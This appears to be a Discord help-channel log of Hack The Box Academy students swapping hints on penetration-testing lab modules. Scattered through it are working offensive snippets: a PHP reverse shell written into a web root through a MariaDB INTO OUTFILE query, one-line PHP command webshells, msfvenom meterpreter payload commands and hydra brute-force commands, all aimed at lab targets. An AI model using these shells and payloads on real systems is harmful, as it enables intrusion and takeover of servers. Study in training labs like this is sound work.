something that is widely documented online

You're saying that nishang is better to do powershell revshell than the website revshells ?

It looks like nishang mainly propose the antak webshell

or you can try hoaxshell, powershell revshell on that site (revshells.com) never work for me btw

Well just worked after few hours and reset... But still can't know why it didn't work before

Thanks for the info !

there should be other example payload on that section, try a different payload and you shuold be able to get RCE and read the flag without a shell

in my experience nishang reverse has never failed

also it has reverse using ICMP protocol for situations where outbound tcp traffic is not allowed

Well, after few examination, powershell converted in b64 from revshells.com didn't work cause the b64 added a space before my IP...

remember powershell works in utf-16

you need to convert from utf8 to utf16 then to base64

but you said from powershell to powershell, why do you need encoding here?

Well it was for the pass the ticket of the password attack module

Well it was for the pass the hash of the password attack module

You had to use a hash to execute a powershell script from another target in the domain

By the way if I can ask a quick question, does anyone really take 8hours to finish the password attacks module ? It take me about 14 hours and still didn't finish.

The time scheduled by hack the box academy seems to always be divide by 2 or 3

it really depends on the individual

introduction to windows command line is scheduled for 4 days and it took me ~12 hours

because i had background before starting it

i think the team behind the academy content creation calculate the time with the assumption that the student has minimal or zero knowledge of the subject

Well I guess I pass to much time doing rockyou brute force when I would need to work mostly with the ressources given by htb

Thank's for your review

yea brute force with rockyou is far away from being realistic at least in Enterprise environments

Hello everyone,

Could I get a nudge with 'attacking common services: MAIL'? I've enumerated the user as per Q1 and am now working on getting the user's password. Brute forcing with hydra and the provided password list but it's completing in seconds even though its 333 passwords and showing '0 valid passwords' for the user. Currently running a rockyou brute as well but the pwnbox isn't quick when it comes to such large wordlists... I know i'm on the right track but i'm very confused to why the brute is coming back without any results. hydra syntax I'm using: || 'hydra -l user -P ./pws.list 10.129.255.254 pop3' || I've also used the syntax with|| pop3://10.129.255.254/|| with the same results.

Edit: NVM I got it... needed to add the domain name to the user... e.g. user@inlanefreight.htb

@violet umbra

if you are on SMTP hint use ||smtp-user-enum ||

Need some help on AD Enumeration & Attacks Skills Assessment part 2. On the very last two questions where I need to get access to DC01. I see that the port for evil-winrm is open, but nothing connects. I can evil-winrm into MS01, but can't RDP and I believe that I need to eventually RDP into DC01. Any help would be greatly appreciated

Thanks! I was already past that part though, had issues with user syntax to brute the creds, not enum the user.

hint you don't need RDP on DC01 but you should be able to RDP into MS01 with one of the user cred you found previously for a Q

also hint look at some of the 9 Q that Q hint a user we got have a sus right over DA

if that's the case hint when brute forcing, for the username make sure you have the full domain name

In "Attacking Enterprise Network" module "Web Enumeration & Exploitation" upon log to the WP instance I get a "502 Proxy Error" anyone had the same problem?
Edit: Solved

I have tried to RDP with all the users using xfreerdp but all I get is this error for each user

are you using the "root" user?

I did not find a "root" user...I found 4 users. Are they supposed to have "root" privileges, or are they actually named "root"?

I'm sorry, I meant are you using the "root" user on your pwnbox to issue the xfreerdp command? If yes, switch to "htb-student"

or when running xfreerdp did you use sudo?

No I am htb-student

I do not use sudo...

Still doesn't work with sudo

maybe restart the pwnbox

restarted, but same issue. If the creds were wrong it would be a different error wouldn't it?

nevermind...gave wrong password and got same error

guys need help i cant find the answ to this Find and submit the contents of the TXT record as the answer. i have tired like a week please just give me the answer to this task

the module is Active Subdomain Enumeration

yo guys

how can i connect to stmp server and use cred to login i tried this so far

Trying 10.129.61.209...
Connected to 10.129.61.209.
Escape character is '^]'.
220 WIN-02 ESMTP
EHLO inlanefreight.htb
250-WIN-02
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
AUTH LOGIN PLAIN
334 UGFzc3dvcmQ6

any help

I think you're trying to rdp inside an ssh connection?

That is correct. Was that the problem? I was finally able to connect I used proxychains

Yup, you can't rdp like that.

That's why it was asking you to check the DISPLAY env variable.

lol, doubtful I will forget that tidbit again 🥲

Since it's a different machine, and you're trying to xfreerdp inside that. You need to have that machines GUI or It won't pop the RDP.

never mind guys some googling is useful

what am doing wrong?

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\pipe\SQLLocal\SQLEXPRESS01
  Error getting security:
  All pipe instances are busy.
No matching objects found.

PS C:\Users\htb-student\Desktop>gci \\.\pipe\

    Directory: \\.\pipe\SQLLocal


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
------       12/31/1600   4:00 PM              3 SQLLocal\SQLEXPRESS01```

go through the dns section of the footprinting module again

Hi, im new here and im doing the Footpriting lab. I already mount de nfs and i enter the nfs fille but is just a bunch of tcikkets. am i in wrong path?

Look carefully at the files.

thx i will

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -l fiona@inlanefreight.htb -P pws.list -f 10.129.26.242 smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-20 13:37:36
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 333 login tries (l:1/p:333), ~21 tries per task
[DATA] attacking smtp://10.129.26.242:25/
[ERROR] all children were disabled due too many connection errors

why its too many errors

is my syntax

bad

your syntax is right

Hey guys, could someone give me some brief help on the ATTACKING COMMON SERVICES lab easy module? I'm trying to upload a shell.

When running the cmd=___ from the site in firefox, I am only able to run 'whoami' and 'dir' and 'more' doesn't work.

I am planning out the Penetration Tester Job Role Path.

How many hours is it? All i see on the site is "43 days"

1,032 hours

anyone know who it works?

have you tried cat

or less

yoy coud brut froce the paswword

i think 1 day is ~8 hours

@sly dome thank you. I thought so but didn't want to assume

Hello,
I'm doing PIVOTING, TUNNELING, AND PORT FORWARDING part: Meterpreter Tunneling & Port Forwarding

I created payload with command
||msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.24 -f elf -o backupjob2 LPORT=8081||
Started meterpreter listener and transferred file to ubuntu machine
When I run ./backujob2 I go error Segmentation fault (core dumped)
and on my attacker machine I have : 10.129.17.43 - Command shell session 4 closed.

Can anyone tell me whats the problem ?

how did you transfer ?

always an individual perspective coz it depends on how many hours you’re dedicating to it per day

im already doing 10h/day

i don’t get your point xD

if someone is a beginner but he learns real quick new stuff and also is putting >8h/day

he will be able to finish it in a month or less

you cant measure how long a course will take

you can estimate and they did with the 43 days

but the content of the path is not extremely dense or difficult imho

its somewhat intermediate

I would rate the difficult equal to

Ranking up iron 1,2,3 in Valorant

You never know 500 hours ? Maybe
190 hours could be

And don't forget if you know foundational knowledge. It can save so many hours

also do infosec foundations as path description advises

Don't forget to learn how to use

LIGOLO-NG

It can save 20-30 hours

way better than chisel, for me is the best pivoting tool

I don't know if it was user error or Ligolo-NG error, but with both Dante and Offshore I often saw people using Ligolo-NG and then things not working. Once they started using Chisel, it worked without problems.
So it may as well cost you a lot of extra hours.

?

how can it be tool error

thats weird

Yes, but since it affected multiple people, I really don't know if it was the user.

I did not try that in labs but thanks for sharing it is always good to know more than 1 tool and methods

how can socks work and tcp dont

i can’t see the logic behind being tool fault

Mass Human error ?

also weird

Get the binary and try to figure out lol

I don't know why certain commands didn't work when they used ligolo ng.

do you have the references?

guys i found an ftp server

that connect to a web broweser

can i use the ftp to uplaod a php file

Perhaps

and trigreit from visitiong the web site

Why not just fuck around and find out?

Unfortunately no, this help on Offshore and also Dante often lie months back
I do not keep a record of who I helped with what and when.

I noticed error in setting up meterpreter listener,
I dint select payload.
Now its working but sending stage takes forever and does;nt want to finish.
now its stuck :/

Instead of asking

no problem mate, i have Dante in my route and i'll use Ligolo-ng

we will discover xD

I used ligolo for Dante... I've only made it like 60% through, but it had been working without noticeable issue for me

some one know how to upgrdae the shell

in winmdows to fully interactive

What exactly do you mean by full interactive?
How did you create your webshell? What exactly does this thing do?

not sure if this is the right place to ask a small question;
I'm doing a task which wants me to put the hash as an answer, I get the hash but it says "incorrect answer"?

If it's an Academy module, you're absolutely right. But you need to provide some more information
Which module?
Which section?
Which question?
What did you do, or what does not work?

Make sure there is no space at the beginning or at the end of the hash.

Linux File Transfer Methods
Linux section;
I've SSH'd into the machine which has the zip file, typed "hasher [zip file]", received the hash but still says incorrect answer

nvm, am idiot, still trying to learn HTB.
Only other question, is RDP sessions always unstable with HTB?

This Question?

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer.

Yeah, thats my bad, skipped over the "unzip" part.

the previous section where you have to RDP into the session, I cant seem to get a stable connection, I've got a VPN connection but it connects me, few seconds later the connection drops.
Same module.
Section: Windows File Transfer Methods

i used my sql

Download the VPN file again. Choose TCP
https://academy.hackthebox.com/vpn

to write a php file into the web dir

i got the shell back but only two cmndsworking whoami and dir

im trying to upgrade the shell

For the upload of the shell?
Then it is probably a very simple webshell with which you can send exactly one command at a time. This shell never becomes fully interactive.

Will give tcp a shot, cheers for the help PayloadBunny!

MariaDB [(none)]> SELECT "<?php set_time_limit(0); $ip = '10.10.14.129'; $port = 1234; $sock = fsockopen($ip, $port); while(!feof($sock)) { $command = fgets($sock, 1024); $output = shell_exec($command); fwrite($sock, $output); } fclose($sock); ?>" INTO OUTFILE 'C:\\xampp\\htdocs\\me.php';
Query OK, 1 row affected (0.100 sec)

cant i use msfvenom

to inject another reverse shell to my machine

cuz now im confused how can i get the flag

Yes, you can try to create an exe and upload it there. But the question is, why?

You only have to read out the flag 🙂 You can do that with a PHP webshell without problems.

i cannot change the dir

You don't need to.

i need to reaad the flag

As I said, with the webshell you can execute exactly one command and then you are back to the original state.

this is my web shell

or try another web sheel

Yes, brutally complicated, but works 🙂
With this you can send a command and are then back in the original state

For example, you can take a look at the C:\ drive.
dir c:\

If there is a flag, you can view it like this:
more c:\flag.txt

what about this error ──(shadowalker㉿kali)-[~/easy]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.129 LPORT=4444 -f exe > payload.exe
Error: unloadable payload: windows/meterpreter/reverse_tcp

ill try to do this now

still i want to learn how to upgrade the shell in windows for the first time

there is no equivalent in Windows of upgrade a tty fromLinux

the most you have is conptyshell

from the one and only Antonio Cocomazzi

https://github.com/antonioCoco/ConPtyShell

you can‘t upgrade a WebShell….

really

even tho like uplaoding an exe inside thi session

its not a webshell right? you received it via netcat

this is not a webshell tho

TCP fixed the connection issues PayloadBunny ^^ thanks for that.

but if you have access to MariaDB you have access to the system itself

what u tryna do?

https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php

you could read the flag from MariaDB

i think you are trying to complete advanced topics for which you dont have the fundamentals yet

yes

they showed us how to write files with my sql

then we need to do this

its attack common services easy lab

Yeah, then write an easy PHP Webshell and use it 😉

like this <?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>

<?php system($_GET['cmd']); ?>

i tried it btw 🙂

i didnt knwo that i need to use ?cmd=

This script says take the GET parameter cmd and pass the value to system

instead of cmd you can enter whatever you want here.

<?php system($_GET['shadowexe13']); ?>

Then you can use it like this:
yourfile.php?shadowexe13=ls

i sent you how to read files from the MariaDB itself xD

im reading it right now

cool, use it

lool

ofc you have to know the path of the flag

yeah

easy?

yeah

one line

xD

it make sens now

more Google !!

And that's exactly what he needs the WebShell for in this lab 😉

nice !

btw was it guessable? 🤣

The path? Yes

thank you so much guys

bouth of you

guessing is a nice skill for a pentester

im lokking for the flag path

no problem dude

If I remember correctly, it is a standard path. ||User directory or Admin directory. Desktop or Documents Folder ||

thats what im looking inside

guys that enough for me today thank you i learned something new thanks guys for your help my head hurts

Module INTRODUCTION TO BASH SCRIPTING, section Flow Control - Loops

should we add this to erratum?

or is that intended, i think no because they teaching us the ${#var} syntax

Yeah, post it, then the author looks at it and can decide for himself if he wants to change it

kk

Hey guys, got a little question, so I did a lot of box this 3-4 days, maybe 10. And I realize that now that I am at the 10 I forgot what i did in the 1st one. Is it normal ?

(Idk if its the good chanel to ask those question)

the ${#var} is the syntax for checking how many characters are in a variable

and it does not include the new line

Heyooo peepes

Who's in charge her of the modules for CPTS? I'd like to report a typo

#858470491676737536

If I don't write anything down, then by Box 2 I already forget exactly what I did in Box 1.... 🤪

You are always on top of everyhting my friend, thank you

After a certain time, you know how things work here...

That do be why bunny do the bunnying

But like you helped me hundreds of times now, how do I give you some recognition? Send you flowers? HTB respect points? Hand made cookies delivered to your house?

There's a respect button on htb

I have started with some HTB Respect points for now @acoustic owl

Done 🔥

👌

So you do write up for each box?
It’s scared me a little, because i tell my self if I forgot its like i resolve it for nothing

you and me both said the same bro !

Hey can you use your own vm to connect to htb academy targets?
I dont see any vpn file to download and it seems like you have to use the pwnbox.

Yes, I take notes on how to get which problem solved.

the answer should be 34070 (actual number of string’s characters) and it’s at this moment 34071

you should read the comments i added to my screenshot before commenting!!

You can use your own vm
Just download your VPN File here
https://academy.hackthebox.com/vpn

omg thank you so much, you're a champion ❤️

And broo second question I begin cybersec at 23 years, is it late ? (Some people will say you are crazy 23 yo is young, but some people begin at 13, so …). And if you have any advice for mee to

It's never too late to learn something new.

It's too late when the spoons kill you

You have a spoon trauma

Anyone want to work on MODERN WEB EXPLOITATION TECHNIQUES - Final Skills Assessement?

I got the first flag easily, but I'm stuck on the rest

Have you tried harder?

When you have found the first flag, you should also be able to answer question two

With this, you should easily find a way to answer question three

I would assume so, but the password wasn't in "there". Don't want to ruin anything for the rest of people, so I won't say what "there" is, but let me tell you I poked around and couldn't find anything except for the flag

That a tier 3 module?

Or cbbh

Tier 3

Tier III

if you need help with q2, send me a dm.

Best vpn quality price ?

Better ask in #general
If you have no access, read and follow #welcome

is there anyone who did the ad skillls lab part 2 that can help me?

HAHAHA this is just 2 good

hey now, nano just works

ctrl-x -> y is only thing you need to know

Vim is best

Module: Blind SQL Injection

For some reason Im getting this error. Cant interact with mssql

mssqlclient.py thomas:'TopSecretPassword23!'@10.129.80.96 -db bsqlintro

Anyone know the fix?

I like dbeaver

for the first exercices ?
Have you try with sqsh.

sqsh -S 10.129.80.96 -U thomas -P 'TopSecretPassword23!' -h

Dbeaver is life

If they're using parrot, sqsh has issues

Hi folks 👋 , I'm doing the "AD Administration: Guided Lab Part I" lab in the Academy. I'm trying to connect to the Windows machine from the HTB Parrot workstation:

$ xfreerdp /v:IP /u:USER /p:PASS
[07:41:09:641] [4505:4506] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[07:41:09:641] [4505:4506] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[07:41:10:944] [4505:4506] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[07:41:10:944] [4505:4506] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[07:41:10:959] [4505:4506] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[07:41:10:960] [4505:4506] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx

The xfreedrp window opens, but the screen remains black. I tried resetting the target machine a few times. I also tried connecting using my Kali VM using the HTB VPN, but the result is the same. Any idea how to troubleshoot this?

Try to press "Enter"

Thanks, that was it! 😅

hello, i need help on Module Windows Privilege Escalation: Vulnerable Services
I have tried to reverse shell but it does not work for me, I also tried to add htb-student to the administrators group but I still can't access any file, what i am missing?

https://academy.hackthebox.com/module/67/section/910

once you have added the "htb-student" to the administrator group did you open the prompt as admin?

yup but it require admin password

someone told me to restart the windows but idk how on rdp

I'm confused you added a user to the administrator group right?

Why do you need the admin password and not the one for the current user you have added (if you did set a password)

yes i finished add my current user to administrator group but it seems like I need to restart to make it works but idk how to restart on windows rdp

no you don't need to do so

hi i have a problem in broken authentication module/ brute forcing username/second assessment

i tried much things but i can't reach the solution

thanks bro, as you said i dont need to restart, my machine is broke, I just restart the machine and now it works... thank again

i tried brute forcing with hydra and zap and i watched responses and i didn't got any thing

Any info on when the HTB backend issue will be solved? Been stuck on the Active Directory Enumeration & Attacks module for a while now cause RDPing is next to impossible unless you get in by chance. Otherwise connection fails right after the password

reach out to support to make them aware of any issues you are having

Hello everyone, im looking for text editor that runs on command prompt or powershell and its native to windows like nano in linux, somebody know something?

vim (not native though)

i have to install it...

think i no have internet connection